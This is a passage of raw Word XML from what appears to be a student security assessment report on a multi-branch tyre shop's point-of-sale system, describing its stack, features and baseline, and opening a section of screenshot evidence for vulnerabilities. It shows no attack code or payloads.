    <w:p w14:paraId="3094F4BA" w14:textId="77777777" w:rsidR="0008357A" w:rsidRDefault="0008357A">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A3F3BCE" w14:textId="77777777" w:rsidR="0008357A" w:rsidRDefault="0008357A">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54E37CA9" w14:textId="77777777" w:rsidR="0008357A" w:rsidRPr="005C54CB" w:rsidRDefault="0008357A">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48414D3F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="0008357A" w:rsidRDefault="008125F0" w:rsidP="00C23DD3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="24"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008357A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. The application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3D4753" w14:textId="5ED4A57D" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
      <w:pPr>
        <w:spacing w:after="239" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E60209" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="173"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A point-of-sale and inventory system for a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tyre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> shop with multiple branches, in production use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8BB599" w14:textId="77777777" w:rsidR="00C23DD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Backend</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C23DD3" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Laravel 10.50 / PHP 8.1, Sanctum bearer tokens, MySQL. 14 API controllers, ~102 routes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8E6AB" w14:textId="4A020D94"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Frontend</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C23DD3" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> React 19, Vite, Tailwind, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. 24 pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E5E7F8"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Domain features:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> invoicing with cash and credit sales, FIFO batch stock allocation, a customer credit ledger, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>goodsreceived</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> notes with adjustment history, a discount-request approval workflow (cashier requests → administrator approves), multi-branch separation by "department", staff management, and sales/profit reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C47EA0A" w14:textId="2CE1FD21" w:rsidR="00C23DD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 xml:space="preserve">Why </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> application qualifies</w:t>
      </w:r>
      <w:r w:rsidR="00C23DD3" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">It is our own prior work, not a teaching application. It is not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WebGoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, DVWA or any </w:t>
      </w:r>
      <w:r w:rsidR="0068258C" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>deliberately vulnerable</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> target, and the hardened version was not publicly available before this assignment. It has genuine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4700D143" w14:textId="5D5BFCC9" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00C23DD3" w:rsidP="00C23DD3">
      <w:pPr>
        <w:ind w:left="14" w:right="16" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cope:</w:t>
      </w:r>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> real money, real customer PII, multi-tenancy, a role model and an approval workflow</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> enough structure for authorization flaws to be meaningful rather than academic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0568CBB7" w14:textId="47FCF93E" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="322"/>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0528" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40B91E8E" wp14:editId="18D5FAB1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1808857</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-11834</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1752600" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25759" name="Group 25759"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1752600" cy="304800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1752600" cy="304800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="252" name="Shape 252"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="419100" y="0"/>
                            <a:ext cx="1333500" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1333500" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1323975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1326605" y="0"/>
                                  <a:pt x="1328850" y="929"/>
                                  <a:pt x="1330710" y="2788"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1332570" y="4647"/>
                                  <a:pt x="1333500" y="6893"/>
                                  <a:pt x="1333500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1333500" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1333500" y="126455"/>
                                  <a:pt x="1332570" y="128700"/>
                                  <a:pt x="1330710" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1328850" y="132418"/>
                                  <a:pt x="1326605" y="133348"/>
                                  <a:pt x="1323975" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133348"/>
                                  <a:pt x="4650" y="132418"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128700"/>
                                  <a:pt x="0" y="126455"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4647"/>
                                  <a:pt x="2790" y="2788"/>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58" name="Shape 258"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="466725" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="466725" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="459830" y="0"/>
                                  <a:pt x="462075" y="929"/>
                                  <a:pt x="463935" y="2788"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="465795" y="4649"/>
                                  <a:pt x="466725" y="6893"/>
                                  <a:pt x="466725" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="466725" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="466725" y="126454"/>
                                  <a:pt x="465795" y="128699"/>
                                  <a:pt x="463935" y="130558"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="462075" y="132418"/>
                                  <a:pt x="459830" y="133348"/>
                                  <a:pt x="457200" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133348"/>
                                  <a:pt x="4650" y="132418"/>
                                  <a:pt x="2790" y="130558"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4649"/>
                                  <a:pt x="2790" y="2788"/>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759" style="width:138pt;height:24pt;position:absolute;z-index:-2147483622;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:142.43pt;mso-position-vertical-relative:text;margin-top:-0.931854pt;" coordsize="17526,3048">
                <v:shape id="Shape 252" style="position:absolute;width:13335;height:1333;left:4191;top:0;" coordsize="1333500,133350" path="m9525,0l1323975,0c1326605,0,1328850,929,1330710,2788c1332570,4647,1333500,6893,1333500,9525l1333500,123825c1333500,126455,1332570,128700,1330710,130559c1328850,132418,1326605,133348,1323975,133350l9525,133350c6895,133348,4650,132418,2790,130559c930,128700,0,126455,0,123825l0,9525c0,6893,930,4647,2790,2788c4650,929,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 258" style="position:absolute;width:4667;height:1333;left:0;top:1714;" coordsize="466725,133350" path="m9525,0l457200,0c459830,0,462075,929,463935,2788c465795,4649,466725,6893,466725,9525l466725,123825c466725,126454,465795,128699,463935,130558c462075,132418,459830,133348,457200,133350l9525,133350c6895,133348,4650,132418,2790,130558c930,128699,0,126454,0,123825l0,9525c0,6893,930,4649,2790,2788c4650,929,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1552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63FF0841" wp14:editId="49EC890B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>159615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="466725" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25761" name="Group 25761"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="466725" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="466725" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="255" name="Shape 255"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="466725" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="466725" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="459830" y="0"/>
                                  <a:pt x="462075" y="929"/>
                                  <a:pt x="463935" y="2788"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="465795" y="4649"/>
                                  <a:pt x="466725" y="6893"/>
                                  <a:pt x="466725" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="466725" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="466725" y="126454"/>
                                  <a:pt x="465795" y="128699"/>
                                  <a:pt x="463935" y="130558"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="462075" y="132418"/>
                                  <a:pt x="459830" y="133348"/>
                                  <a:pt x="457200" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133348"/>
                                  <a:pt x="4650" y="132418"/>
                                  <a:pt x="2790" y="130558"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2790" y="2788"/>
                                </a:ln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761" style="width:36.75pt;height:10.5pt;position:absolute;z-index:-2147483622;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:12.5681pt;" coordsize="4667,1333">
                <v:shape id="Shape 255" style="position:absolute;width:4667;height:1333;left:0;top:0;" coordsize="466725,133350" path="m9525,0l457200,0c459830,0,462075,929,463935,2788c465795,4649,466725,6893,466725,9525l466725,123825c466725,126454,465795,128699,463935,130558c462075,132418,459830,133348,457200,133350l9525,133350c6895,133348,4650,132418,2790,130558l0,123825l0,9525l2790,2788c4650,929,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Baseline</w:t>
      </w:r>
      <w:r w:rsidR="00C23DD3" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The unmodified code is tagged </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>v0-original-vulnerable</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in both new repositories. Backend last original commit </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>d997cbc</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (18 May 2026); frontend </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>52b7707</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (27 May 2026).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Selected live vulnerability evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Four representative live application screens are included as concise evidence, one for each presenter. The complete before/after results remain in the automated evidence files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5257800" cy="3219480"/>
            <wp:docPr id="1399636539" name="Picture 1399636539"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="V02-original-live.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5257800" cy="3219480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Figure 4. Ravindu - V-02 original employee profit report showing revenue, cost, profit and margin data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5257800" cy="3219893"/>
            <wp:docPr id="1399636540" name="Picture 1399636540"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="V10-original-live.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
